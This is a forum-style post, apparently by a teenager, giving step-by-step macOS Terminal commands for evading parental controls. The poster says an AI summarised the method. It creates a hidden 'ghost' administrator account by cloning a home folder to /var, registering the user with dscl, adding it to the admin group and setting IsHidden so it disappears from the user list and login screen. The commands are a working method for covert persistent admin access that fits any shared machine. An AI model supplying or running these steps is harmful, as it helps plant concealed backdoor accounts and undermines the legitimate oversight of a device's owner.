first of all, dont go commenting on this getting angry and saying i need to touch grass or should be a better kid, i walk my dogs every day and get good grades in school
so my parents r super controlling and wont even let me code and stuff (i get 45 minutes a day), so enough about me, here is a bypass i figured out, first u need to go into system settings > users & groups, and make a new account, but if u want to be more sneaky do this: (i used ai to summarize it dont crash out):
If you need to maintain admin access on a shared Mac without the account appearing in System Settings > Users & Groups or the login list, follow this "Ghost Account" method:
- Create the Secret Folder: Use Terminal to clone your current user data into a hidden system directory. You must rename the copied folder to
proxyadminso the system recognizes it correctly.sudo cp -Rp /Users/yourusername /var/proxyadmin
- Register the "Ghost" Identity: Run these commands to create the account in the system database and link it to the folder you just renamed.
sudo dscl . create /Users/proxyadminsudo dscl . create /Users/proxyadmin UserShell /bin/zshsudo dscl . create /Users/proxyadmin NFSHomeDirectory /var/proxyadminsudo dscl . create /Users/proxyadmin UniqueID 999sudo dscl . create /Users/proxyadmin PrimaryGroupID 20sudo dscl . passwd /Users/proxyadmin YourSecretPasswordsudo dscl . append /Groups/admin GroupMembership proxyadmin
- Enable Stealth Mode: This flag removes the user from the "Users & Groups" list entirely and ensures the new user owns the files.
sudo dscl . create /Users/proxyadmin IsHidden 1sudo chown -R proxyadmin /var/proxyadmin
- How to Log In: Since the icon is invisible, go to the login screen and press Option + Return. This brings up empty "Name" and "Password" boxes. Type
proxyadminand your password to enter the ghost account.
Make sure to read all the commands cuz some u want to replace like ur secret password with ur password u want.
Hope u bypass those stupid controls! :D